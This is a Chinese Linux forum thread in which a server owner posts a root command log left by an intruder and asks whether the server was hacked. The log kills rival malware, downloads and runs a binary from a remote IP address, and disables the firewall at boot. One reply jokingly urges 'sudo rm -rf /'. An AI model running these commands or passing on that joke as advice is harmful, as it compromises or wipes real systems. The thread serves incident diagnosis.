网页资讯视频图片知道文库贴吧地图采购
进入贴吧全吧搜索

 
 
 
日一二三四五六
       
       
       
       
       
       

签到排名:今日本吧第个签到,

本吧因你更精彩,明天继续来努力!

本吧签到人数:0

一键签到
成为超级会员,使用一键签到
一键签到
本月漏签0次!
0
成为超级会员,赠送8张补签卡
如何使用?
点击日历上漏签日期,即可进行补签。
连续签到:天  累计签到:天
0
超级会员单次开通12个月以上,赠送连续签到卡3张
使用连续签到卡
08月29日漏签0天
linux吧 关注:517,409贴子:2,570,208
  • 看贴

  • 图片

  • 吧主推荐

  • 视频

  • 游戏

  • 38回复贴,共1页
<<返回linux吧
>0< 加载中...

谁来帮忙看看是不是被黑了?

  • 只看楼主
  • 收藏

  • 回复
  • 光之精灵MKIII
  • ----xr-x
    13
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
今天看服务器发现root下被执行了一大堆命令
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
killall lixtest
killall linuxx
killall ssh3
killall ssh4
killall ssh6
killall ssh-32
killall ssh-64
killall ssh-c4
killall java.13.2.8_11
killall drmc
killall tmpof
killall 1471
killall 1417
killall v432
killall v532
killall 29881
killall 10993
killall behsdf
killall helen
killall lampp
killall Umi34Ber
killall mysql.sock
killall x1
killall xxx
killall dos32
killall dos6
killall 007
killall t32
killall lq64
killall t64
killall lq32
killall java.132.8_11
killall 261180
killall sshbin
killall xudp
killall xupd1
killall xudp2
killall xudp3
killall xudp4
killall xudp5
killall .Mm2
killall .TSm
killall java.2.15.22_20
killall linuxssh
killall strutsbin
killall 266189
killall auto.bin
killall 3232
killall 6832
killall Dols3
killall huang
killall KDLinux
killall txma
killall xja
killall xjb
killall .IptabLex
rm -r -f 3232
rm -r -f 6832
rm -r -f Dols3
rm -r -f huang
rm -r -f KDLinux
rm -r -f txma
rm -r -f xja
rm -r -f xjb
rm -f -r /tmp/lixtest
rm -f -r /tmp/linuxx
rm -f -r /tmp/ssh3
rm -f -r /tmp/sh4
rm -f -r /tmp/ssh6
rm -f -r /tmp/ssh-32
rm -f -r /tmp/ssh-64
rm -f -r /tmp/ssh-c4
rm -f -r /tmp/drmc
rm -f -r /tmp/tmpof
rm -f -r /tmp/1471
rm -f -r /tmp/1417
rm -f -r /tmp/v432
rm -f -r /tmp/v532
rm -f -r /tmp/29881
rm -f -r /tmp/10993
rm -f -r /tmp/behsdf
rm -f -r /tmp/helen
rm -f -r /tmp/lampp
rm -f -r /tmp/Umi34Ber
rm -f -r /tmp/mysql.sock
rm -f -r /tmp/266189
rm -f -r /etc/x1
rm -f -r /etc/xxx
rm -f -r /etc/dos32
rm -f -r /etc/dos64
rm -f -r /etc/007
rm -f -r /etc/t32
rm -f -r /etc/lq64
rm -f -r /etc/t64
rm -f -r /etc/lq32
rm -f -r /etc/java.132.8_11
rm -f -r /etc/261180
rm -f -r /tmp/sshbin
rm -f -r /tmp/xudp
rm -f -r /tmp/xupd1
rm -f -r /tmp/xudp2
rm -f -r /tmp/xudp3
rm -f -r /tmp/xudp4
rm -f -r /tmp/xudp5
rm -f -r /tmp/java.2.15.22_20
rm -f -r /tmp/linuxssh
rm -f -r /tmp/strutsbin
rm -f -r /tmp/266189
rm -f -r etc/java.13.2.8_11
rm -f -r /etc/auto.bin
killall netstat.kv3Ads
rm -r -f /tmp/netstat.kv3Ads
find /etc/ -name "*.service2" -exec rm {} \;
killall idmapd.so.cp
rm -r -f /etc/idmapd/idmapd.so.cp
killall .idmapd_open
rm -r -f /etc/idmapd/.idmapd_open
mkdir /etc/idmapd
wget -O /etc/idmapd/.idmapd_open http://61.147.110.119:12340/110.119
chmod 0755 /etc/idmapd/.idmapd_open
nohup /etc/idmapd/.idmapd_open > /dev/null 2>&1 &
echo "/etc/init.d/iptables stop">>/etc/rc.local
myFile="/etc/idmapd/.idmapd_open"
if [ ! -f "$myFile" ]; then killall sess_7fd28830c68bc43b1e42a43b2e250715; rm -r -f /tmp/sess_7fd28830c68bc43b1e42a43b2e250715; wget -O
/tmp/sess_7fd28830c68bc43b1e42a43b2e250715 http://61.147.110.119:12340/10991; chmod 0755 /tmp/sess_7fd28830c68bc43b1e42a43b2e250715; nohup
/tmp/sess_7fd28830c68bc43b1e42a43b2e250715 > /dev/null 2>&1 & fi
rm -r -f java.pl
chmod 0644 /usr/bin/nohup
chmod 0644 /usr/bin/killall
exit


  • 还是来碗米饭吧
  • ----xrw-
    14
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
不(xi)明(wen)觉(le)厉(jian),另外突然发现一个java.pl,这名字起的……


2025-08-29 16:35:02
广告
不感兴趣
开通SVIP免广告
  • 那早起的蜗牛
  • ----xr-x
    13
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
前排 前入


  • SangeeLau
  • -------x
    1
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
你是linux服务器,同时你应该使用了tomcat吧。
如果确认,回我,最近这个问题比较大


  • opelok3
  • -------x
    1
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
恩,估计是这样子的,我们服务器也发生这种情况。


  • fyyz_me
  • ----xr--
    12
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
服务器被入侵建议重装


  • hailongqiu_arm
  • -----rwx
    7
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
确实被人黑了,现在只有一招可以救你,请记住
sudo rm -rf /
只要复制上面的话过去,然后执行一篇,搞定


  • lisa00544
  • -------x
    1
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
怎么解决的,我也遇到了这样的问题。求指导


2025-08-29 16:29:02
广告
不感兴趣
开通SVIP免广告
  • 围幕
  • -----r--
    4
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
就被黑了?好牛逼啊


  • the_ccIvan
  • -------x
    1
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
IptabLex 是一个病毒程序 还会有一个叫 IptabLes 在init.d目录里找找 boot里找找 全删掉 就行了 我也被一样的问题困扰了好几个月 建议升级下tomcat


  • 397643782
  • ------w-
    2
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
艇舰歪热浪遥杨:权限狗 蝌蚪游眼睛 不下台,液尾 爆吧不止 霍


  • 林俊鹏snaki
  • ----x-w-
    10
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
黑客在江苏扬州市,楼主最近电脑有被谁碰过哦,还有指令前那两个被提升权限的文件给删了


登录百度账号

扫二维码下载贴吧客户端

下载贴吧APP
看高清直播、视频!
  • 贴吧页面意见反馈
  • 违规贴吧举报反馈通道
  • 贴吧违规信息处理公示
  • 38回复贴,共1页
<<返回linux吧
分享到:
©2025 Baidu贴吧协议|隐私政策|吧主制度|意见反馈|网络谣言警示